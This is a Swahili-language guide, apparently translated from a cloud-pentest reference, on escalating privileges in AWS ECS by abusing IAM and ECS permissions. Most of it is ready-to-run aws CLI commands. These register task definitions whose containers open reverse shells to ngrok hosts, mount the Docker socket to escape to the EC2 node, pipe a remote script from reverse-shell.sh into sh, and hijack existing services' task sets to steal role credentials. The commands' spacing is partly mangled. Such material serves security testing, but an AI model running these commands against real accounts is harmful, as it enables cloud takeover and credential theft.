Mshambuliaji anayekandamiza ruhusa ya iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \--network-mode "awsvpc" \--cpu 256--memory512\--requires-compatibilities "[\"FARGATE\"]" \--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# Run task definitionawsecsrun-task--task-definitioniam_exfiltration \--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \--launch-type FARGATE \--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
# Delete task definition## You need to remove all the versions (:1 is enough if you just created one)awsecsderegister-task-definition--task-definitioniam_exfiltration:1
Madhara Yanayoweza Kutokea: Privesc ya moja kwa moja kwa jukumu tofauti la ECS.
Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia.
Hata hivyo, katika kesi hii, inahitajika kuwa na mfano wa konteina ili kuendesha tafsiri mbaya ya kazi.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \--network-mode "awsvpc" \--cpu 256--memory512\--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
aws ecsstart-task--task-definitioniam_exfiltration \--container-instances <instance_id># Delete task definition## You need to remove all the versions (:1 is enough if you just created one)awsecsderegister-task-definition--task-definitioniam_exfiltration:1
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.
Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia kwa kuunda huduma mpya yenye angalau kazi 1 inayoendelea.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn "$ECS_ROLE_ARN" \--network-mode "awsvpc" \--cpu 256--memory512\--requires-compatibilities "[\"FARGATE\"]" \--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
# Run the task creating a serviceawsecscreate-service--service-nameexfiltration \--task-definition iam_exfiltration \--desired-count 1 \--cluster "$CLUSTER_ARN" \--launch-type FARGATE \--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"# Run the task updating a serviceawsecsupdate-service--cluster<CLUSTERNAME> \--service <SERVICENAME> \--task-definition <NEWTASKDEFINITIONNAME>
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.
Hali hii ni kama zile za awali lakini bila ruhusa ya iam:PassRole.
Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha kontena yoyote, hata kama huna jukumu, unaweza kuendesha kontena chenye mamlaka ili kutoroka hadi kwenye node na kuchukua jukumu la EC2 IAM na majukumu mengine ya kontena za ECS yanayoendesha kwenye node.
Unaweza hata kulazimisha kazi nyingine kuendesha ndani ya EC2 instance uliyovunja ili kuchukua hati zao (kama ilivyojadiliwa katika sehemu ya Privesc kwa node).
Shambulio hili linawezekana tu ikiwa klasta ya ECS inatumia EC2 instances na sio Fargate.
printf'[{"name":"exfil_creds","image":"python:latest","entryPoint":["sh", "-c"],"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],"mountPoints": [{"readOnly": false,"containerPath": "/var/run/docker.sock","sourceVolume": "docker-socket"}]}]'>/tmp/task.jsonprintf'[{"name": "docker-socket","host": {"sourcePath": "/var/run/docker.sock"}}]'>/tmp/volumes.jsonawsecsregister-task-definition--familyiam_exfiltration \--cpu 256--memory512 \--requires-compatibilities '["EC2"]' \--container-definitions file:///tmp/task.json \--volumes file:///tmp/volumes.jsonawsecsrun-task--task-definitioniam_exfiltration \--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \--launch-type EC2# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza kutekeleza amri ndani ya kontena linaloendesha na kuhamasisha jukumu la IAM lililounganishwa nalo (unahitaji ruhusa za kuelezea kwa sababu ni muhimu kutekeleza aws ecs execute-command).
Hata hivyo, ili kufanya hivyo, kifaa cha kontena kinahitaji kuwa kinaendesha ExecuteCommand agent (ambayo kwa kawaida hakiko).
Kwa hivyo, mshambuliaji anaweza kujaribu:
Jaribu kutekeleza amri katika kila kontena linaloendesha
# List enableExecuteCommand on each taskfor cluster in $(awsecslist-clusters|jq.clusterArns|grep'"'|cut-d'"'-f2); doecho"Cluster $cluster"for task in $(awsecslist-tasks--cluster"$cluster"|jq.taskArns|grep'"'|cut-d'"'-f2); doecho" Task $task"# If true, it's your lucky dayawsecsdescribe-tasks--cluster"$cluster"--tasks"$task"|grepenableExecuteCommanddonedone# Execute a shell in a containerawsecsexecute-command--interactive \--command "sh" \--cluster "$CLUSTER_ARN" \--task "$TASK_ARN"
Ikiwa ana ecs:RunTask, endesha kazi na aws ecs run-task --enable-execute-command [...]
Ikiwa ana ecs:StartTask, endesha kazi na aws ecs start-task --enable-execute-command [...]
Ikiwa ana ecs:CreateService, unda huduma na aws ecs create-service --enable-execute-command [...]
Ikiwa ana ecs:UpdateService, sasisha huduma na aws ecs update-service --enable-execute-command [...]
Unaweza kupata mfano wa chaguzi hizo katika sehemu za awali za ECS privesc.
Madhara Yanayoweza Kutokea: Privesc kwa jukumu tofauti lililounganishwa na kontena.
ssm:StartSession
Angalia katika ukurasa wa ssm privesc jinsi unavyoweza kutumia ruhusa hii ili privesc kwa ECS:
Mshambuliaji mwenye ruhusa ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda seti ya kazi mbaya kwa huduma iliyopo ya ECS na kusasisha seti ya kazi ya msingi. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya huduma.
bashCopycode#Registerataskdefinitionwithareverseshellecho'{"family": "malicious-task","containerDefinitions": [{"name": "malicious-container","image": "alpine","command": ["sh","-c","apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"]}]}'>malicious-task-definition.jsonawsecsregister-task-definition--cli-input-jsonfile://malicious-task-definition.json# Create a malicious task set for the existing serviceaws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"
# Update the primary task set for the serviceaws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
Madhara Yanayoweza Kutokea: Teua msimbo wa kawaida katika huduma iliyoathiriwa, ambayo inaweza kuathiri utendaji wake au kutoa data nyeti.
